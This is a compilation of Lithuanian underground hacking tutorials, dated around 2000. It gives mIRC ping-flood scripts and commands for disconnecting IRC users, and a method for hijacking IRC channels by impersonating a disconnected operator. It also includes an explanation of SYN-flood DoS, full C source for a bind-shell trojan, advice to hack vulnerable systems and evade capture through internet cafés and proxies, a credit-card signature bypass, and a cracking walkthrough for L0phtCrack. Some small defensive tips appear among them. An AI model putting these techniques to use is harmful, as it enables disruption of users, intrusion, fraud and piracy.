parsisiunchiam agurkaz-script (ish http://mr2lt.cjb.net) … spaudziam “klonuotiz” ir prijunge antra mIRC’a prie servo imames chiuwako mirties … zodziu spaudziam fludaz/ping fludaz (shis mano (ir netik) nuomone veiksmingiausias) gaunam “musu tajkinyz ?” irasom musu aukos nick … “kiek pingu siusim ?” irasom pvz : 1000 (shiaip uztenka apie 200 … bet tikrumo labuj) … “laikaz (sekundem) tarp [ping] ?” irasom pvz : 2 (nemaziau 2-ju … o shiaip wiskas priklauso nuo jusu ineto ryshio kokybes … kuo prastesne tuo labiau didint …) tik shikart nespaudziat ok … wiska tapati pasidarot ir kitame jau paleistam mIRC’e ir viena po kito (abiejuose) paspaudziat ok … ir pradedat stebet kas vyksta … stebit ping reply … kur ping reply laikas turetu vis didet … ir po shiek tiek lajko “blogiukas” padaro quit (excess flood) 😉 (kad padarys luzhau galima tiketis gavus ping reply laika … apie 40sek … ir daugiau … o kartajs ir maziau …) kaj chiuwakas luzhta … arba pvz : tau niekajp nepavyksta jo atjabalint … tiesiog sustabdom fluda … fludaz/sustabdyt visuz fluduz …

tapati galima padaryt i aliases irasius pvz :

/fludazzz { .set %tajkinys $$?=”musu tajkinys ?” .timer10 $$?=”ping sk. ?” $$?=”laikas tarp ping ?” /ctcp %tajkinys ping } /stopfludazzz { .timer10 off } ir tada norint fludint reik parasyt “/fludazzz” komanda … o norint nutraukt ping fluda “/stopfludazzz”

(na norint totaliaj pasitychiot ish lamuxos … atjunge ji pasikeiskit savo klono nick y jo … sugryzes chiuwakas dar ilgaj stebesis “kas chia do veikejas tokipati nick kajp mano sugalvojo ? ir dar klausia ‘kaijp sekas lama ? ;)’ ?!?”)

kaip visa taj vyksta ? … ogi paprastaj : servas paprastaj supyksta jej kaskoks “kenkejas” pradeda be skaiciaus siust ctcp’us ir jej pvz : “laikaz (sekundem) tarp [ping] ?” irasytumet pvz : 0 … shiuo atveju servas jus atjungtu (kaijp kenkeja) parasydamas excess flood … o kaij jus kaskam siunciat ping’us … tas kaskas i juos atsakineja pong’ais ir servas supykes uzh vienu metu siunchiama dideli kieki pong’u ji atjungia … (tam kad greiciau atjungt kokitaj chiuwaka ir patariama pasidaryt keleta klonu … nes ping’us tada siuncia keli irc klientaj … o pong’ais atsakineja vienas 😉

tiesa nevisada ping’inamas chiuwakas atjungiamas (excess flood) yra ir kitas bajeris (tiesa rechiau suveikiantis) … reiskias jus pastoviai siunciat tuos ping’us (ish 2-ju ar daugiau klonu) ir kaijp iprasta servas karts nuo karto siuncia PING “paketa” t.y. kaskokitaj skaiciu … irc klijentas gaves shi “paketa” siunchia servuj PONG “paketa” tapati skaiciuka koki gavo … taj daroma tam kad servas zinotu “esi gyvas ar nebera taves ?” … ir kaj chiuwako irc klijentas beatsakinedamas i tavo siunchiamus PING’us pervelaj atsako servuj … servas pagalvoja kad irc userio nebera … ir nesvarbu yra jis ar ne ji papraschiausiaj atjungia parasydamas ping timeout (shitas bajeris suveikia tik tada kaj chiuvako kuri pinginat : senas kompas … blogas rishys … zodziu kaj chiuwakas ir tajp netoli mirties ir tereikia truputi jam padet 😉 ) …

na o pamacius kad visa taj daroma su jumis (jus auka 😉 ) … tiesiog papraschiausiaj reikia uzdeti tam chiuvakui ignora (komanda : “/ignore [nick’as]”) … (daugelyje skriptu taj darosi automatiskaj … kaj chiuwakas per tamtikra laika padaro tamtikra skaiciu ctcp … kad ir pvz : (mano) agurkaz-script’e)

tapati galima padaryt i remote irasius pvz :

CTCP *:*:* { if ( %ctcppro. [ $+ [ $nick ] ] == $null ) { .set %ctcppro. [ $+ [ $nick ] ] 1 .timer 1 10 unset %ctcppro. [ $+ [ $nick ] ] goto pabajga } elseif ( %ctcppro. [ $+ [ $nick ] ] == 1 ) { .set %ctcppro. [ $+ [ $nick ] ] 2 .timer 1 10 unset %ctcppro. [ $+ [ $nick ] ] goto pabajga } elseif ( %ctcppro. [ $+ [ $nick ] ] >= 2 ) { .ignore $nick .echo -a 10[*] $nick katik isbande (mass) ctcp apsauga .unset %ctcppro. [ $+ [ $nick ] ] goto pabajga } :pabajga .halt }

ir tam kad variables nesirinktu siuksliu … options/irc/perform/ uzaktyvuoji (varnele) “on connect,perform these commands :” ir irasaj : “/unset %ctcppro*” komanda … spaudi [OK]

ping fluda galima daryt netgi pasinaudojus dos’u pvz : dos’e rasom : “ping [chiuwako kompo IP]” (chia reikia zhinoti chiuwako kompo IP adresa … jis suzinomas “/dns [nick’as]” komanda sia komanda pingas siunchiamas viena karta …) “ping -l 2800 -t -w 2000 [chiuwako IP]” (staj shia komanda ir galima atjungt chiuwaka … (nesigilinsiu y tixlumus … jej norit detaliau … tiesiog parasykit dos’e “ping” ir gausit gana ishsamia informacija …)) toliau pakalbesiu apie DOS ataka (nemaisykit dos operacines sist. su Denial Of Service ataka 😉 )

na zinoma taj ne pac geriausias budas kanors atjabalint nuo irc servako … kalbu apie DOS (denial of service) ataka … bet ping fludas manychiau pac populiariausias tarp irkininku 😉 … apie DOS atakas daug nekalbesiu (shiaip nuo shios atakos jau gana senaj buvo luzhes net pac www.microsoft.com na o netajpjau senaij (jej zhiurit te-ve) nuo jos nukentejo ir www.yahoo.com bej keletas kitu ineto gigantu 😉 (tiesa uzhpuolikas buvo susemtas (mafiaboy berods)) ) shi ataka kajp jau supratot yra gana daug qr naudojama (paprastaj destrukcijos tixlais) … shios atakos pasekmes neprognozuojamos taj galibut pradedant nuo paprasto kompo pakibimo iki “format c:” (zodziu priklauso ant kiek jusu kompas supsixuos) zodziu naturaliaj inete viskas vyksta taijp : jusu kompas siunchia kitam kompuj SYN “paketa” t.y. prasyma prisijunkti prie kito kompo (chia pvz: ftp http telnet) … kompas (servas) gaves SYN tuojpat siunchia jums atsakyma ACK “paketa” t.y. patvirtinima apie SYN uzklausa jusu kompas prisijungima su kitu kompu uzhtvirtina nauju ACK “paketu” (shio ACK servas laukia keleta min. sek. ir jej negauna ACK (ish jusu) ishmeta ish whaitlisto) … na o dabar isivaizduokit kas darosi jej jus vienu metu uzhplustat serva vien SYN “paketajs” ir neatsakinedami prisijungima patvirtinanchiais ACK … ogi dideja servo waitlistas … niekas negali prisijungt prie servo (jis apkrautas) … ir tarkim jej jus puolat shi kompa ish keliu kompu vienu metu ankschiau ar veliau jis padaro “luzhau” (tas pac www.yahoo.com pavizdys) panasiu principu atakuojami netik servaj bet ir paprasti kompaj … zodziu apie mIRC’a … pac populiariausias shiu laiku nuke’ris beabejo “click v2” ji galite parsisiusti beveijk ish kiekvieno uzhsenietishko servo (daznaj buna platinamas kartu su mIRC skriptajs) … jis veikia DOS atakos principu zodziu pasirenkat auka … darot “/dns [nick’as]” … status lange sulaukiat “resolved *.*.*.*” (vietoj ->*<- skaiciukaj pvz: 127.0.0.1) taj yra chiuwako kompo IP adresas (jej gavot “unable to resolve” tada pysy-propalo … geriau pamirskit ji) … ji irashot y betkokio nukerio “IP” langeli ir vaziuojam … laukiam kol chiudikas “mirs” 😉 na beabejo nuo to yra apsaugu pvz : nukenabber … bet shio dajkchiuko paprastaj niex naudoja (tie kas nori apsigint nuo visokiu DOS (be DOS dar yra pvz : Smurf … Land&Teardrop (visu veikimas panasus)) ataku paprastaj turi pasistate FireWall’us ir ju su shitom atakom nepaimsi ;))

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ [[5]] lameriska instrukcija TAKEOVERINKUJ 😉 ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

tajgi tajgi … tu esi visiskas lama (ar tiesiog gera nuotajka ir nori pasilinksmint (pagazdint vargsus irc userius)) (nepagalvokit kad taj darau nuolat (bet yra buve (neslepsiu)) … shis pamokymas kajptik tau … pirma ka reikia padaryt besiruosiant teikoverint kanala aisq reijkia (apgalvotaj) pasirinkt taikini … reiskias rasaj “/list” ir lauki kol list lange pasirodys visi tuo metu esami kanalaj … renkiesi nej dideli nej maza … kokiu 5-9 zmoniu kanala (chia pagal skoni 😉 ) !!!neuzejni i ji!!! … tau pvz : patiko #lamers kanalas rasaj “/names #lamers” ir status lange pamataj chiuwaku sedinciu shiame kanale sarasa … !!!patarimas-ispejimas!!! : kanale kuri pasirinkaj turetu sedeti keli zmones turintys o’pus (@) t.y. tau reikes bent keliom sekundem atjungti viena ish ju … ir po vieno ish ju luzhimo kanale turi likt bent vienas zmogus su @ … t.y. ne botas … ne klonas nes jis (jej kvailas ir nesupranta kas yra excess flood … palaikes tave savo draugu) ir turi tau duoti op’a … kurio tau ir reikia norint takeover’int kanala … toliau : jej pasirinktam kanale sedi @rkp shita kanala geriau pamirsk 😉 pasirinkus kanala ir chiuwaka kuris tures trumpam luzhti daraj : “/ctcp [nickas] version” (zodziu kad nesiplesciau pasakysiu kad reikia ji atjungti nuo irc nors keliom sekundem …) (apie taj rasiau truputi ankschiau … (jej shizofrenija sergi)) ji atjungus nuo servo stajgiai keiti savo nick’a i jo nick’a (tam reijketu iskart pasiruost) ir uzeini y (musu atveju) #lamers kanala … tada jej pasiseks to chiuwako draugaj kuri tu katik atjungej tau duos op’a ir poto manau tu pac zhinaj ka reikia daryti 😉 (massdeop … zodziu tu turi likt vienas turintis @ priesh savo nick 😉 ) ir tada daraj kanori su perimtu kanalu … o vargsaj apgautieji tik ir spjaudos keiksmais … grasina nukeriu … ping fludu 😉 (na jej esi tikras lama aisq greitaj padaraj luzhau … ir buni itrauktas tu chiuwaku shitlist’us (sudziu sarasus))

na o norint nuo to apsisaugot … reikia tiesiog but atidesniais … pamacius quit(excess flood) reiketu isitikint kad gryzo jusu draugas ir jej esat jums brangiam kanale be rkp geriau pasisaugokit … (man paciam buvo bajeris kaj 2-se susikurem nuosalu kanala ishbandyti mano script … uzhejo chiuwakas davem jam op’sa o tas 2-viem savaitem bota su invite only pastate (kanalo aisq negajla … laikinas buvo) bet pamokele gera 😉 ) taipogi neuzdejinet autoOPo kad ir net paciam geriausiam drauguj pagal nick’a … (maza kas gali atsitikt … sugalvos kox loxelis nick’a kaijp tavo draugo pasiimt ir uzheis netycia y kanala … gaus op’a ir priximicins)

レトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトソ ウ autorius : mr2 ウ ウ data : 2000 ウ ウ url : http://mr2lt.cjb.net ウ ウ @mail : mr2@xxx.lt ウ タトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトトル

(shi straipsneli leidziu laisvaj platinti inete be mano leidimo tik butu labaj grazu kad jo turinys nesikeistu … o del gramatiniu klaidu nepykit (ne spaudaj ji parashiau 😉 ) jej aciras norinciu kad parasychiau tutorial’a apie mIRC skriptu rasyma … ar norinciu patart … pataisyt … papildyt shi TUT … mano @mujla zhinot)

(mIRC’e mane galit rasti pvz : #mr2 kanale nick: “mr2” arba “agurkaz”)

21. Kaip nesielgti hakinant

Kaip nesielgti Jus taip nedarykite Vasara del savo neismanymo nukentejo daugelis Lietuvos svetainiu: centras.lt search.lt ir kitos, kuriose buvo skelbimu lentos ar guestbook`ai. As maniau, kad tai buvo gera pamoka ju administratoriams, bei visiems kitiems. Bet pasirodo as klydau. Viena diena, narsydamas www ir sededamas IRC radau nuoroda i viena idomu puslapi: www.satan.lt – juodosios brolijos puslapis. Uzsukes i ji ir perzvelges, sumaniau uzsukti i guestbook`a ir pagirti saita. Uzsikrovus guestbook`ui pamaciau kazka panasaus i tai: galima ivesti html komandas. Pvz: vietoj [ENTER] galima rasyti

. Ir ka jus apie tai manot??????????? Ar tai ne administratoriu klaida, baisi klaida? Bet, pagalvojau as, gal jie nors JavaScrip filtruoja? Tad as emiau ir isbandziau tai. Paprasciausiai irasiau prie savo girtino/peiktino teksto keles eilutes: ; beto idejau nuoroda i uid0 saita: Aisku as galejau visiskai sudirbti si saita: JavaScript pagalba galejau atidaryneti, uzdarineti langus, bei daug daug kitko, iterpus nuoroda i file:///con/con/ galejau nukepti visus win 9.x vartotojus, kurie ten uzklystu. Bet as taip nesiilgiau. As paprasciausiai padariau tik ispejima puslapio webmaster`iui. Kur sio dokumento vertes objektas? Viena kart ismokite daryti tai gerai, ismokite mokytis ne tik is savo bet ir is kito klaidu. Filtruokite savo chat`uose, guestbook`uose, mesage bourde`uose ir kitur kur lankytojai gali ivest teksta (ir jis bus spausdinamas html dokumente) visus HTML tagus, neleiskite vykdyti JavaScript, VisualBasic ir pan. Narsykite www tik isjungia Java. Taip jus isvenksite Java/JavaScript ataku. P.S. As tai nelaikau tikru hackinimu, tai paprasciausiai…

22. Kaip tapti hakeriu

Pirmiausia, manau, apsispresk ar tikrai nori buti hackeriu, nes:

1. Hakeriavimas yra nelegalus (bent daugelyje valstybiu [Lietuvoj kolkas ne]). Netgi tuose valstybese, kuriuose hakerevimas nera antiistatimiskas hakeris vistiek pazeidzia dauguma istatymu. Pvz.: asmens teise i privatuma (E-mail, www, acount ir kt.).

2. Hakeriavimas nera lengvas uzsiemimas, tu turi vis ieskoti ir ieskoti daug info apie naujausius exploitus (arba kaip tikras hakeris juos paciam daryti), ieskoti sistemu klaidu etc. Todel hakervimas dar ir daug laiko uzimantis uzsiemimas. Negalima per savaite tapti hakeriu. Tai pat negalima dometis tuo puse metu ir poto padarius pauze vel gristi. Ne, tu paprasciausiai per daug atsiliktum. Ne taip negalima!

Negalvok, kad filmuose apie hackerius, kopmiuteriu piratus etc rodoma tiesa. Negalvok, kad hakeris koks herojus, gebantis prikirsti visas paneles, dirbantis geroje firmoje etc. Priesingai- ar tau patiktu matyti savo artimuosius, draugus verkencius, liudincius kai tave sujima teisesauga, VSD (valstybes saugumo departamentas).

Bet jai vistiek apsisprendei tapti hakeriu tai pradek kuo greiciau, nes sis informasinis pasaulis keiciasi taip greit, kad nekiekvienas geba ji pasivyti ir neatsilikti.

1.Kaip pradeti?

Daugelyje interneto sistemu stovi UNIX, LINUX, FreeBSD, NetBSD, vienu zodziu, *NIX. Tad norint pradeti hakinti reikia ismokti tai. Aisku negalvok, kad nereikia ismokti windows`u. Priesingai, juos irgi reikia ismanyti. Jei nezinojai yra net ir speciali windowsu versija (distribucija ar pan) skirta serveriams. Tai windows NT.

Taigi griskime prie *NIX. Gauk kokia tai *NIX distribucija, instaliuok ja ir pradek mokytis. Kaip mokytis *NIX? Pradziai gauk pora knygu, tokiu kaip “Linux zaliems” ar pan. Perskaityk jas. Poto imk ka nors rimciau. dalyvauk konferencijuose kuriose snekama ape *NIX. Priprask prie *NIX. Paprogramuok juose. Ismok gerai konfiguruoti sistema. Automatizuok savo veiksmus darydamas skriptus. Ismok *NIX`e (ir netik ten) naudotis internetu (E-mail, telnet, ssh, www, ftp, irc, icq ir kt.). Jei ko nors nezinai nepulk klausineti visu. Paprasciausiai RTFM (read the fucking manual). Niekada negalvok, kad *NIX`e viska jau ismanai.

Na daba jau tu ismanai pakankamai apie *NIX. Gauk savo tikra (ne localu) acounta.

Narsyk www, siurb visa info apie hakinimo metodus, nauja programine iranga, jos klaidas (bug`us). Stenkisc pats rasytis exploitus. Tam turi ismokti keleta programavimo kalbu: c/c++, perl, java.

Prisiregistruok prie ivairiu hakeriu konferenciju, naik i pora IRC serveriu- ten rasi bendraminciu,galesite pasidalinti info ar pan. Nepralesk pro akis nei vieno hack saito.

Ismok neikliuti! Nes kai ikliusi bus per velu! Kaip neikliuti skaityk straipsnyje paranoja.

Ieskok pazeidziamu sistemu ir hakink jas. Tavo tikslas gauti kuo daugiau acount`u is kuriu galetum hakinti kitas sistemas.

Ir jei tu viska darai, kaip parasyta cia- tada gali tapt hakeriu.

23. Kaip veikia trojanai

Cia pabandysiu paiskinti kokiu principu veikia trojanai, kaip jie rasomi etc.Imkim ir panagrinekim paprasciausia trojana parasyta C kalba:

#include <stdio.h> // iterpiamas standartinio I/O funkciju headeris#include <errno.h> // klaidu#include <signal.h%gt; //signalu. Nezinot kas tie signalai? Tai kaip jus naudojates kill programa?#include <stdlib.h>#include <netinet/in.h> // iterpemi visi headeriu failai reikalingi dirbti su tinklu, socket ir pan.#include <sys/types.h>#include <sys/socket.h>#include <strings.h> // darbui su eilutem

// Nusirodyk koki tavo trojanas porta naudos, naudok koki standartini- gali lama adminas pamirses sumaisyt su kokiu ftp_data (20 portas) ar pan // Kitu atveju naudok koki kita porta kuris maziau stebimas #define P 12345 // ant prikolo imam netbus porta

#define SH “/bin/sh” // nusirodai koki shella naudos tavo trojanas#define LISTN 5

int main(int argc, char **argv){

//pasveikinimo (welkome) zinutechar *fst = “nConnected!nn”;char *sec = “This tool demonstrated how works trojansn”;char *thr = “Please enter each command followed by ‘;’n”;

int outsock, insock, sz; //soketu deskriptoriai, ir pagalbinis kintamasis, kuris saugos eiluciu dydi (size)

//reikalingos dvi soketu sructuros (irasai) in ir outstruct sockaddr_in home;struct sockaddr_in away;//set port, proto and bzero for BINDhome.sin_family=AF_INET;home.sin_port=htons(P); // atkreipk demesi cia nurodomas taviskis portashome.sin_addr.s_addr=INADDR_ANY;bzero(&(home.sin_zero),8);

signal(SIGCHLD,SIG_IGN);

// pats idomumas prasidedaif((outsock=socket(AF_INET,SOCK_STREAM,0))<0) // ar su soketais viskas oreexit(printf(“Socket errorn”));

if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) // ar bindina oreexit(printf(“Bind errorn”));

if((listen(outsock,LISTN))<0) //ar listinaexit(printf(“Listen errorn”));

sz=sizeof(struct sockaddr_in);

// jo cia tai tikrai strukturinis programavimasfor(;;) // o rimciau tai amzinas ciklas{if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0) //laukiam isoriniu signalu, tuo paciu tikrinam ar nera klaidosexit(printf(“Accept error”));if(fork() !=0) //jei sukuriam, dukterini (child) procesa{send(insock,fst,strlen(fst),0); // siunciam sveikinimo zinutesend(insock,sec,strlen(sec),0);send(insock,thr,strlen(thr),0);dup2(insock,0); // nukreipem STDIN (file deskriptos=0) i soketadup2(insock,1); // nukreipiam STDOUT (file deskriptos=1) i soketadup2(insock,2); // nukreipiam STDERR (file deskriptos=2) i soketaexecl(SH,SH,(char *)0); // paleidziam savo shellaclose(insock); // uzdarom soketaexit(0); // stai ir baigesi musu sudetingas trojanas.}close(insock); // jei nejo sukurt dukterinio proceso (ziureti fork() ) tai uzdarom ansyk soketa ie einam lauk.}}

Stai taip atrodo pats elementariausias trojanas. O jus turbut manete, kad tai sudetinga. Siaip sis trojanas ira gan blogas. Jei norite gero trojano eikit ihttp://packetstorm.securify.comir isten temkit r00tkit`a. Siuo metu as kaip tik apsistojes ties trojanu rasymu, kai parasysiu koki krutesni imesiu. Tad laukite.Kas sake kad lietuviai trojanu neraso?

Kaip anonimizuotis kitu budu/keliu By Whisperer // whisperer@worldmailer.com for www.underground.lt

Visi nori anonimizuotis. Visi privalo anonimizuotis jeigu uzsiima ne tik narshymu po puslapius apie geliu auginima, o daro ka nors nelegalaus. Populiariausias budas proxy servai. Tachiau su vienu nieko nepadarysi. Jeigu tikrai nori gerai anonimizuotis turi susijungti i grandine proxy1>proxy2>proxy3 etc. Dar geriau jeigu tie proxiai kinietishki, japanski ar dar kokie (sunkiau susisiekti su ju adminais ir gauti tavo ip adresa) Tachaiu sparta ziauriai, ziauriai krenta. Ir norint patekti i vilniu ish kauno gaunasi vaziavimas per klaipeda. Ash siulau kita buda. Mieste pilna (bent jau Kaune) visokiu internet’o kaviniu ir t.t. Kai kurios labai nuoshalios ir ten tam tikrom valandom nebuna daug zmoniu (pvz. Sonex’as savanoriu prospekte prie Juzes). Mokestis iki 6 lt uz valanda. Ateini, atsineshi savo irankius, savo reikalinga infa, pasedi valandele, nuhackini ka nors ir pasishalini. Atseks ip adresa nuhackinto servo adminai ir bus jiems ledas. Aishu jeigu nori galima ir ish ten jungtis per kelis proxius (paprastai tokiose vietose ryshys boona geresnis nei per dial-up’a) ir “nuskriausti” adminai tures dar daugiau vargo. Mazai tiketina kad zmogus prileides tave prie interno atsimins ir gales nupasakoti tavo ishvaizda, o tavo duomenu jis nezinos. Aishku nebookit durniai neikit antra kart i ta pachia vieta.

kam daryti sunkiau jei galima lengviau?

2000(c) by Whisperer // whisperer@worldmailer.com

24. KREDITINES KORTELES

Parenge: MG, 1999, KaunasPagal: ‘Credit Carding’ by David Lightman and ‘The Administration’

Kreditines korteles turi mazhiausia 3 apsaugos priemones, kuriu jusneturetumete iveikti. Tai yra saskaitos numeris, parasho laukas irmagnetine juosta.

Saskaitos numeris——————

Telefono numeris kartu su miesto kodu turi 8 skaiczius, asmens kodas – 11.Tacziau pilnas MasterCard kreditines korteles saskaitos numeris turi 20skaicziu. Kam tiek daug?Matematishkai kreditines korteles numeriui pakanka ashtuoniu skaicziu.Kiekvienas korteles savininkas, be abejo, turi tureti unikalu,nesikartojanti numeri. Kompanijos Visa ir MasterCard turi mazhdaug po65 mln. klientu kiekviena. Taigi ju numeracijos sistemos turi sutalpinti apie65 milijonus imanomu numeriu.Egzistuoja shimtas milijonu imanomu kombinaciju ish ashtuoniu skaicziu:00000000, 00000001, 00000002, 00000003, …. iki 99999999. Taigi, ashtuoniuskaicziu visishkai pakanka. Ateities augimui numatyti, saskaitos numeriuipakaktu devyniu skaicziu, kas uzhtikrina milijarda skirtingu numeriu.Faktishkai, Visa kortele turi 13 skaicziu, American Express – 15, DinersClub korteles – 14, Carte Blanche – 10. Abejotina, kad kredito kompanijosplanuoja tureti visus shiuos milijardus klientu ir suteikti jiemsskirtingus numerius. Shie papildomi skaicziai reikalingi saugumosumetimais.Tarkime, jusu Visa korteles numeris yra 4211 503 417 268. Kiekvienaspirkinys turi buti ivestas i kompiuteri ish prekybos terminalo. Saskaitosnumeris susieja pirkini su jusu saskaita. Asmenys, ivedantys saskaitunumerius i kompiuteri gali kartais suklysti ir ivesti pvz. 4211 503 471 268arba 4211 703 417 268. Taigi shios trylikos skaitmenu numeracijos sistemosprivalumas yra tas, kad tikimybe, kas kitas klientas tures saskaitos numeriatitinkanti 4211 503 471 268 arba 4211 703 417 268 labai mazha. Egzistuoja10 trilijonu imanomu trylikos skaitmenu Visa numeriu (0000 000 000 000;0000 000 000 001; ……… 9999 999 999 999). Tik apie 65 mln ish ju yratikri, egzistuojantys saskaitu numeriai. Tikimybe, kad klaidingai ivestaskorteles numeris atitiks egzistuojanti numeri yra kazhkas apie 1 prie 150 000. Kitos korteliu numeracijos sistemos yra dar saugesnes. Ishkvadrilijono imanomu penkiolikos skaitmenu American Express korteliunumeriu tik 11 milijonu yra naudojami. Tikimybe kad atsitiktinai surinktasnumeris atitiks egzistuojanczios saskaitos numeri yra mazhdaug 1 prie 90 000 000. Imant visus 20 MasterCard numerio skaitmenu, yra kvintilijonas(100 000 000 000 000 000 000) imanomu numeriu 65 milijonams klientu.Galimybe atitaikyti numeri czia nevirshija vieno prie pusantro trilijono.Be kita ko, tokia sistema suteikia galimybe ‘neakivaizdinei’ prekybai,apmokant kreditinem kortelem. Pvz., kai TV-reklamos siulo skambinti ir uzhsisakyti kokia nors preke telefonu, operatores, kurios priima uzhsakymusnegali matyti nei kreditines korteles, nei jos savininko parasho. Kaip josgali zhinoti, ar skambinantysis ishvis turi kreditine kortele?Jie grindzhia savo pasitikejima kreditiniu korteliu numeracijos sistemossaugumu. Jeigu kas nors skambina ir panaudoja ishgalvota numeri, shisnumeris, tikriausia, neatitiks egzistuojanczios saskaitos numerio. Ar toksnumeris egzistuoja ar ne, galima patikrinti labai greitei, pasijungus priekredito kompaniju kompiuteriu. Visais praktiniais tikslais, naudojant levakreditkes numeri, yra vienintelis budas – nuskaityti ji nuoegzistuojanczios kredito korteles. Plastiko gabaliukas nera butinas, pakankanumerio.

Parasho laukas—————

Jus negaletumete ishtrinti parasho korteleje, jeigu gaunate levakreditke. Jeigu jus ar kas nors kitas megintumete tai padaryti, greitisitikintumete, kad kortele tampa visishkai nebetinkama naudoti, (bent jaujos jau negalima rodyti). Kai kurios korteles turi specialu parasho laukopagrindo dizaina(linijini ornamenta), kuris nusitrina, jei kas nors bandoishtrinti parasha, paliekant balta plema. Ant kitu, bandant ishtrintiparasha, pro pazheista parasho lauko pagrinda pasirodo zhodis ‘VOID’,zhymintis korteles netinkamuma naudoti.

Budas apeiti shia saugumo priemoneJeigu parasho laukas neapsaugotas linijiniu ornamentu arba sunkiaiatkartojama spalva, parasho lauka galima uzhdazhyti.

Magnetine juosta—————-

Daugelis mano, kad magnetineje juostoje uzhkoduota daug informacijosapie korteles savininka, arba apie saskaitos balansa. Realiai, jojeneimanoma irashyti daugiau, nei i panashaus ilgio garso kasetes juosta.Ishtikruju magnetineje juostoje pakanka irashyti saskaitos numeri arkitokia identifikacijos priemone. Bet kokia kita informacija, reikalingapinigu pervedimui atlikti, tokia pvz. kaip saskaitos balansas, gali butiishtraukta ish banku kompiuteriu ir nera reikalo kodoti jos paczhiojekorteleje. Ta pati galima pasakyti del informacijos apie kortelessavininka. Be identifikacijos, magnetineje juostoje gali buti irashytagaliojimo data, nes bankomatai kartais ‘prarija’ kortele, kai jos galiojimolaikas pasibaiges, netgi jeigu balansas yra tvarkoj.Informacija magnetineje juostoje galima ishtrinti palaikius virsh josstipru magneta.

25. L0phtCrack v2.5 krekinimas

Info:Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)Irankiai: SoftICE, WinDasm, UCOL Patch Maker, Betkoks šešioliktainis redaktoriusTaikinys: L0phtCrack v2.5 (www.l0pht.com/l0phtcrack)

Intro:Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti.

Pora sakinių:Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, WinDasm, šešioliktainį redaktorių ir asembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):…INIT=”CODE ON; X;”… EXP=c:windowssystemkernel32.dllEXP=c:windowssystemuser32.dllEXP=c:windowssystemgdi32.dll…Kombinacijos:Ctrl+D – įeiti į SoftICE;F5 – įšeiti iš SoftICE;F10 – vykdyti programą po vieną eilutę;F8 – jeigu esame ant procedūros, įeiti į ją.Visus įrankius galima atsisiųsti iš http://ucol.home.lt/cgi-bin/ucol.pl?l_tools.

Krekinimas:Pirmiausiai reikia nukopijuoti failą l0phtcrack.exe į kokią saugią vietą (to reikės vėliau). Dabar paleidžiame pačią programą (L0phtCrack), spaudžiame mygtuką „Register” ir lauke „Unlock code:” įvedame betką ir žiūrime į iššokusią žinutę: “You have entered an invalid code. Please try again”. Dabar įeiname į disasemblerį (WinDasm). Atidarome failą l0phtcrack.exe (jis yra krekinamos programos direktorijoje). Vykdome paiešką pagal matytą žinutę: “You have entered an invalid code”, t.y. einame į WinDasm meniu sklitį „Search” ir vykdome komandą „Find Text”. Lauke „Find what:” ir įvedame tą žinutę. WinDasm lange atsiduriame čia:…:0040635F 52 push edx:00406360 50 push eax:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas:00406366 83C408 add esp, 00000008:00406369 85C0 test eax, eax:0040636B 7435 je 004063A2 <- ar mūsų unlock geras/blogas :0040636D 6A00 push 00000000:0040636F 6A00 push 00000000

* Possible StringData Ref from Data Obj ->”You have entered an invalid code. “->”Please try again.” <- mūsų žinutė

:00406371 6830354800 push 00483530:00406376 E8F0020500 call 0045666B:0040637B 56 push esi:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]:00406383 E812EE0300 call 0044519A:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]:0040638F E88ED50300 call 00443922:00406394 83F801 cmp eax, 00000001:00406397 0F846EFFFFFF je 0040630B…

Dabar programą L0phtCrack užkrausime per SoftICE loaderį (loader32.exe). Užkrauname loaderį. Atidarome failą l0phtcrack.exe. Paskui užkrauname programą spausdami mygtuką „LOAD” arba eidami į programos meniu „MODULE/LOAD”. Aktyvuojasi SoftICE, tada spaudžiame F8 (vieną sykį). Dabar rašome: Bpx 40635f (tai mes matėme disasembleryje). Bpx yra viena iš SoftICE komandų, o skaičius 40635f yra vykdomos programos eilutės vieta. Taigi įrašyta eilutė lieps SoftICE sustabdyti programos veikimą ties ta eilute. Suprantat link kur suku? Dabar išeiname iš SoftICE (F5). Pasileidžia L0phtCrack. Vėl einame į programos užregistravimo langą. Lauke „Unlock code:” surenkame sux.Spaudžiame OK. Aktyvuojasi SoftICE. Matome labai panašų vaizdą kaip irDisasembleryje (WinDasm):…:0040635F 52 push edx:00406360 50 push eax:00406361 E8FAFE0100 call 00426260 <- unlock tikrinimas:00406366 83C408 add esp, 00000008:00406369 85C0 test eax, eax:0040636B 7435 jz 004063A2 <- geras/blogas unlock:0040636D 6A00 push 00000000:0040636F 6A00 push 00000000:00406371 6830354800 push 00483530:00406376 E8F0020500 call 0045666B:0040637B 56 push esi:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0]:00406383 E812EE0300 call 0044519A:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080]:0040638F E88ED50300 call 00443922:00406394 83F801 cmp eax, 00000001:00406397 0F846EFFFFFF jz 0040630B…

Rašome: d edx (Hmm kažkas yra. Užsirašome tai savo lape)d eax (Mūsų įvestas “sux” (be kabučių))Komanda d parodo registro (EAX, EDX…)turinį. Sintaksė yra tokia: d registras.

